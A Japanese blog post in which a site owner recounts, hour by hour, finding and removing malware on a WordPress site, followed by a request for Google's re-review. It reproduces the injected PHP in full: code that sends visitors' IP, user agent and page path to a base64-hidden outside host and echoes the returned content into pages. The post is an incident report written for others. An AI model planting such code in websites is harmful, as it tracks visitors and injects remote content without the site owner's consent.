ワードプレスで構築したサイトが,マルウェアに感染しました【時系列編】
ジメジメする毎日で、うんざり気味のまるです。
お恥ずかしい話ですが、このサイト、マルウェアに感染しました。
恥さらしもあるのですが、技術的に解決する情報提供のために、以下一連の流れを記載したいと思います。
▼7/4 11:00
1.Googleのウェブマスターツールより感染連絡メールが届く
この時点で、サイトにアクセスると、ローカルに入れている「アバスト」ウィルス対策ソフトが警告を出した。
2.ウェブマスターツールの状態
この段階で、少々パニック気味になる、、、感染経路は?何をやられたんだ?いつからだ??
とりあえず、サイトに基本認証をかけて、アクセスを封鎖する。
この段階で、14:00。
3.Googleのウェブマスターツールからヒントをもらう
管理ツールの一覧から、URLをクリックすると、疑わしきコードがわかり、そいつを検索かけてみる。
/wp-content/cache/supercache
この中に、生成されるキャッシュファイルの中に発見するが、これは、一時的に書き出されるファイルのため、これを生成する親元を探さねば、、ムムムム
4.ファイルの更新日
最近設定等、更新してないのに、いくつかのファイルで、タイムスタンプが7/3のファイルを発見する。
中身を確認してみると、見たことない記述が、、、これだ
- <?php
- if (!isset($sRetry))
- {
- global $sRetry;
- $sRetry = 1;
- // This code use for global bot statistic
- $sUserAgent = strtolower($_SERVER[‘HTTP_USER_AGENT’]); // Looks for google serch bot
- $stCurlHandle = NULL;
- $stCurlLink = “”;
- if((strstr($sUserAgent, ‘google’) == false)&&(strstr($sUserAgent, ‘yahoo’) == false)&&(strstr($sUserAgent, ‘baidu’) == false)&&(strstr($sUserAgent, ‘msn’) == false)&&(strstr($sUserAgent, ‘opera’) == false)&&(strstr($sUserAgent, ‘chrome’) == false)&&(strstr($sUserAgent, ‘bing’) == false)&&(strstr($sUserAgent, ‘safari’) == false)&&(strstr($sUserAgent, ‘bot’) == false)) // Bot comes
- {
- if(isset($_SERVER[‘REMOTE_ADDR’]) == true && isset($_SERVER[‘HTTP_HOST’]) == true){ // Create bot analitics
- $stCurlLink = base64_decode( ‘aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRIL3N0YXQucGhw’).’?ip=’ . urlencode($_SERVER[‘REMOTE_ADDR’]) . ‘&useragent=’.urlencode($sUserAgent) . ‘&domainname=’ . urlencode($_SERVER[‘HTTP_HOST’]) . ‘&fullpath=’ . urlencode($_SERVER[‘REQUEST_URI’]) . ‘&check=’ . isset($_GET[‘look’]);
- @$stCurlHandle = curl_init( $stCurlLink );
- }
- }
- if ( $stCurlHandle !== NULL )
- {
- curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);
- $sResult = @curl_exec($stCurlHandle);
- if ($sResult[0]==”O”)
- {$sResult[0]=” “;
- echo $sResult; // Statistic code end
- }
- curl_close($stCurlHandle);
- }
- }
- ?>
更新されたリストの一覧を作成して、ファイルごとの対処法を作成する。
ここで18:00
5.駆除作業開始
一覧から、作業をおこない、ファイルをアップする。
こちらは別途記事を書きましたので、↓参照してください
ワードプレスで構築したサイトが、マルウェアに感染しました【駆除編】
ここで19:00
6.確認
実際に、アクセスして、ソースコードを確認し、コードが吐き出されてないことを確認
キャッシュもクリアしようと思ったが、なぜかクリアされてたので、新しく生成されたファイルの中身を確認するが、ともに問題のコード話
7.Google先生に、再審査の依頼
審査の申し込みは、ウェブマスターツール→マルウェア→「審査をリクエス」ボタンを押すだけ
後は24時間以内に審査が終わるらしい・・・
ちなみに、2時間くらいして同ページにアクセスしたら、「ただいま再審査中です」なるメッセージがでました。
ここで20:00
8.ミッションコンプリート
無事、問題がなくなりました。
日付変わって、7/5 9:00
とっても長い一日でしたよー、無事終わって良かった・・・
あんど、ご迷惑おかけして、申し訳ございませんでした。今後共、セキュリティを強化して運営を行いますので、今後共よろしくお願いいたします。
以上